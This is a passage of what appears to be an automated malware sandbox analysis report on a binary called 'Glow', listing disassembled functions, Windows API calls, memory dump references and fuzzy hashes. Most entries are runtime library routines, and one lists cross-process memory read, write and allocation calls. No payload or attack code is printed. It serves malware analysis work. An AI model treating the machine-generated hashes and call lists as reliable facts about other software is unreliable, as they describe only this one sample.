Part of subcall function 003B3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,003A6A79,?,0000015D,?,?,?,?,003A85B0,000000FF,00000000,?,?), ref: 003B3BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003BD18F
_free.LIBCMT ref: 003BD1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003BD1B1

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 5c3d97883b504bebe164cff99499fb45e4da28480385be25087025a08e73f5e5
Instruction ID: ec3ae441c1adb147b33e4e8c4eba89ece16c56797e57f2d7af157e05a9820254
Opcode Fuzzy Hash: 5c3d97883b504bebe164cff99499fb45e4da28480385be25087025a08e73f5e5
Instruction Fuzzy Hash: 3B01F7B6A026197F336266BE5C8CCFB7A6DDEC2B693150229FE15C6644FA708D0181B4

Function 003B316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,003AF64E,003A545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 003B3170
_free.LIBCMT ref: 003B31A5
_free.LIBCMT ref: 003B31CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 003B31D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 003B31E2

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3387b5c44bd513b00e868a6bacfe3523a4bdb4ec85485ead1dc50f32e631d922
Instruction ID: 001b889032fb7d7a67fa079bd8c42752e5b8488cc0e14c7f74767b5f7c82d721
Opcode Fuzzy Hash: 3387b5c44bd513b00e868a6bacfe3523a4bdb4ec85485ead1dc50f32e631d922
Instruction Fuzzy Hash: 1D01F4B6B416306B9613373C9C86EFB266DABC637E3210539FF3596992EE318B054124

Function 003E08FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?,?,003E0C4E), ref: 003E091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?), ref: 003E0936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?), ref: 003E0944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?), ref: 003E0954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?), ref: 003E0960

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: bcbc680a2d25aa2d54aa4d8fdac412e53f230f2066ecacedae34e08ff449b364
Instruction ID: 8af27249a06ca0e2bd63456311e96e18d5692ee73017017044f33b429e4ecf64
Opcode Fuzzy Hash: bcbc680a2d25aa2d54aa4d8fdac412e53f230f2066ecacedae34e08ff449b364
Instruction Fuzzy Hash: 3601F2B2A00228BFEB025F56DC04B9E7BBDEF44751F104224F905E2262D7B4CD80CBA0

Function 003EF292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 003EF2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 003EF2BC
Sleep.KERNEL32(00000000), ref: 003EF2C4
QueryPerformanceCounter.KERNEL32(?), ref: 003EF2CE
Sleep.KERNEL32 ref: 003EF30A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: f659af24b1d7e591e45e14a6e58afcf2f8e82953111f38a4a62c8ce39504e7c4
Instruction ID: 9083d98e881a51436d0686b52e86b86a92dba49b88595c0448241431a56441bf
Opcode Fuzzy Hash: f659af24b1d7e591e45e14a6e58afcf2f8e82953111f38a4a62c8ce39504e7c4
Instruction Fuzzy Hash: 7301AD74C00529EFCF00AFB5E848AEEBB78FF08300F010566D541B2280DB709554C7A5

Function 003E1A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003E1A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003E1A99

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 331ca220b23479d7c6615042dfbe9e4fa4539962029e6d4b388cd533f29c31af
Instruction ID: 20ba3f8e8c90f36c458f8d1dd0558d2a20398e46da4b5ce75d017b44f9c0fef7
Opcode Fuzzy Hash: 331ca220b23479d7c6615042dfbe9e4fa4539962029e6d4b388cd533f29c31af
Instruction Fuzzy Hash: B30181B9A01215BFDB124F65DC48DAA3B6DEF84364B214424F845C3260DA31DC408A60

Function 003E1900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003E1916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003E1922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003E1931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003E1938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003E194E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 84e666f076773d79ba272200034cf4099eee873c507999c9d2c94f656be2d0f9
Instruction ID: 8bafe239eb0764501a697105eec76c0b46b63e3fb5b627ece502ae9a42284df3
Opcode Fuzzy Hash: 84e666f076773d79ba272200034cf4099eee873c507999c9d2c94f656be2d0f9
Instruction Fuzzy Hash: 1CF062B5500315BBDB210F65DC4DF963B6DEF897A0F114424FA45D7291CB70DC408A74

Function 003E1960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003E1976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003E1982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E1991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003E1998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E19AE

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: aa05416aebec1f63c1cfec6a17f95c1d59a4f2c27ba06b82c76fe36002f6c5ef
Instruction ID: 5f4d7c835c4d214a8eae1c95283bf41b15a772aa0ae50e08c31d9a38db286ea9
Opcode Fuzzy Hash: aa05416aebec1f63c1cfec6a17f95c1d59a4f2c27ba06b82c76fe36002f6c5ef
Instruction Fuzzy Hash: 07F0C2B5500311BBD7220F65EC58F973B6DEF893A0F114520FD05D7291CB30D8008A64

Function 003F0CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,003F0B24,?,003F3D41,?,00000001,003C3AF4,?), ref: 003F0CCB
CloseHandle.KERNEL32(?,?,?,?,003F0B24,?,003F3D41,?,00000001,003C3AF4,?), ref: 003F0CD8
CloseHandle.KERNEL32(?,?,?,?,003F0B24,?,003F3D41,?,00000001,003C3AF4,?), ref: 003F0CE5
CloseHandle.KERNEL32(?,?,?,?,003F0B24,?,003F3D41,?,00000001,003C3AF4,?), ref: 003F0CF2
CloseHandle.KERNEL32(?,?,?,?,003F0B24,?,003F3D41,?,00000001,003C3AF4,?), ref: 003F0CFF
CloseHandle.KERNEL32(?,?,?,?,003F0B24,?,003F3D41,?,00000001,003C3AF4,?), ref: 003F0D0C

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: aae3c108b4c90880dbdee9997eb2e19b2aa8372979b6d578476d018ebf8cd442
Instruction ID: b3b4cc902ceb8f95fb0400e3e4153186c6c0d7006cf3d76d30526345f58f29bd
Opcode Fuzzy Hash: aae3c108b4c90880dbdee9997eb2e19b2aa8372979b6d578476d018ebf8cd442
Instruction Fuzzy Hash: 5B01A271801B19DFCB35AF6ADD80826F7F9BF503153168A3ED2A652932C7B0A944DF80

Function 003E65AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 003E65BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 003E65D6
MessageBeep.USER32(00000000), ref: 003E65EE
KillTimer.USER32(?,0000040A), ref: 003E660A
EndDialog.USER32(?,00000001), ref: 003E6624

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: d2b59951060e7471de98cbae3b925ac4e3ec786fb59e01f5d2c26b424292f41b
Instruction ID: 4b9bbf3912f7882c69c48c45c86a81dbc5517b200d832ed8edf2ce6e6745e6cb
Opcode Fuzzy Hash: d2b59951060e7471de98cbae3b925ac4e3ec786fb59e01f5d2c26b424292f41b
Instruction Fuzzy Hash: B3018170900314ABEB226F21DD4FBD67BBCFB14B45F004669A187A14E1DBF4AA448B94

Function 003BDABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 003BDAD2

Part of subcall function 003B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4), ref: 003B2D4E
Part of subcall function 003B2D38: GetLastError.KERNEL32(00451DC4,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4,00451DC4), ref: 003B2D60

_free.LIBCMT ref: 003BDAE4
_free.LIBCMT ref: 003BDAF6
_free.LIBCMT ref: 003BDB08
_free.LIBCMT ref: 003BDB1A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fffd3314a08d9c5a24f809e4e7115241ba3458a4b9a69731d526ae8319a776dc
Instruction ID: 1f6b7b9e15a50f2e77d99f99dfc59ee49a8cb5bb343fdac3f5785cdda07f1106
Opcode Fuzzy Hash: fffd3314a08d9c5a24f809e4e7115241ba3458a4b9a69731d526ae8319a776dc
Instruction Fuzzy Hash: BCF01272A44204ABC626EB58F981C9B77DDEE057147A60C1DF219DBD01DB30FC808658

Function 003B2610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 003B262E

Part of subcall function 003B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4), ref: 003B2D4E
Part of subcall function 003B2D38: GetLastError.KERNEL32(00451DC4,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4,00451DC4), ref: 003B2D60

_free.LIBCMT ref: 003B2640
_free.LIBCMT ref: 003B2653
_free.LIBCMT ref: 003B2664
_free.LIBCMT ref: 003B2675

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f6a850f56a44a80fd338b215ac4a75ca76eb8a1d1ea488e8058a9ab1fe4ac077
Instruction ID: 966bc6d501c4001e065a63a21805c863f9ebc1c07d244b0ee1b3226c49807614
Opcode Fuzzy Hash: f6a850f56a44a80fd338b215ac4a75ca76eb8a1d1ea488e8058a9ab1fe4ac077
Instruction Fuzzy Hash: BBF03075A013108B8643BF54EC41D9A3764BB257563010B6BF524D6676C7708A01AF8D

Function 003B12B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 003B1469
__freea.LIBCMT ref: 003B1487

Part of subcall function 003B18A7: _free.LIBCMT ref: 003B18BF

Strings

am/pm, xrefs: 003B14EA
a/p, xrefs: 003B154E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 46d3869b8d51ad94dd8ac6b598841cb7614ae1747a7b050b8c49f55efe0c16d3
Instruction ID: 54c731ca2dd4b25a8fddfe1c34880df329d5e187c3bfcea1834899b89dca87ec
Opcode Fuzzy Hash: 46d3869b8d51ad94dd8ac6b598841cb7614ae1747a7b050b8c49f55efe0c16d3
Instruction Fuzzy Hash: 13D13475910206CBCB268F68C8757FAB7B5FF46308FAA015AEB029BE50D7749D40CB90

Function 00405231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

Part of subcall function 003F41FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,004052EE,?,?,00000035,?), ref: 003F4229
Part of subcall function 003F41FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,004052EE,?,?,00000035,?), ref: 003F4239

GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00405419
VariantInit.OLEAUT32(?), ref: 0040550E
VariantClear.OLEAUT32(?), ref: 004055CD

Strings

bn>, xrefs: 004054ED, 004055E4

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorLastVariant$ClearFormatInitMessage
String ID: bn>
API String ID: 2854431205-2383257054
Opcode ID: c552dd8d066cbc07898e7744959add718bc1386713116ec33cf5aea719d25a14
Instruction ID: ea195f698c3c8cd7507f748addb3e04e51a88131c59abfc748a59988cb803ae6
Opcode Fuzzy Hash: c552dd8d066cbc07898e7744959add718bc1386713116ec33cf5aea719d25a14
Instruction Fuzzy Hash: 19D16074A00249DFCB05EF95C891AEEBBB4FF04304F54816EE416AF292DB75A986CF50

Function 0038CF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0038D253

Strings

t5E, xrefs: 0038D23A
t5E, xrefs: 0038CFCF
t5E, xrefs: 0038CFC8

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Init_thread_footer
String ID: t5E$t5E$t5E
API String ID: 1385522511-1177798998
Opcode ID: 91b2ffa83beb621a2068bcc40578e0929da16ab5df18ed8d5c048de80865af83
Instruction ID: bafcb5e3d9e51b522161a63a02a8715eb9cd1a166f3b11bef130343ea16fe338
Opcode Fuzzy Hash: 91b2ffa83beb621a2068bcc40578e0929da16ab5df18ed8d5c048de80865af83
Instruction Fuzzy Hash: 43915BB5A0030ADFCB55DF58C4806A9B7F1FF58300F2581AAD9459B381E731EA82CB90

Function 004061A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 0040623D
_wcslen.LIBCMT ref: 00406249

Strings

bn>, xrefs: 004061B1, 004062E1
CALLARGARRAY, xrefs: 00406243, 00406248

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY$bn>
API String ID: 157775604-3871307600
Opcode ID: 0e2f3b51c218bc7ee552701e5c66d2de9bcd69da44574b840124a802c94c51d6
Instruction ID: 0210b73144f7c3ae3b8daeb19d85287db6b6b44c79ba6e932fdeddac34173318
Opcode Fuzzy Hash: 0e2f3b51c218bc7ee552701e5c66d2de9bcd69da44574b840124a802c94c51d6
Instruction Fuzzy Hash: A341BF71E002159FCB00EFA5C8819EEBBB5FF58320B1141AEE406BB391E7789D81CB94

Function 003E3063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003EBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003E2B1D,?,?,00000034,00000800,?,00000034), ref: 003EBDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003E30AD

Part of subcall function 003EBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003E2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 003EBDBF

Part of subcall function 003EBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 003EBD1C
Part of subcall function 003EBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003E2AE1,00000034,?,?,00001004,00000000,00000000), ref: 003EBD2C
Part of subcall function 003EBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003E2AE1,00000034,?,?,00001004,00000000,00000000), ref: 003EBD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003E311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003E3167

Strings

@, xrefs: 003E317F

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: fa4bca23bc4db31911e35c8dea0e34f07ac47fc4a864849c66e9a4f3b9866df5
Instruction ID: d339a20a37986f3e305b62d445c6c269289b9e35d557cfd9b5247564c5991346
Opcode Fuzzy Hash: fa4bca23bc4db31911e35c8dea0e34f07ac47fc4a864849c66e9a4f3b9866df5
Instruction Fuzzy Hash: 58413D72900268BEDB12DFA5CC45ADEB7B8EF45700F104195F955BB180DB706F85CB60

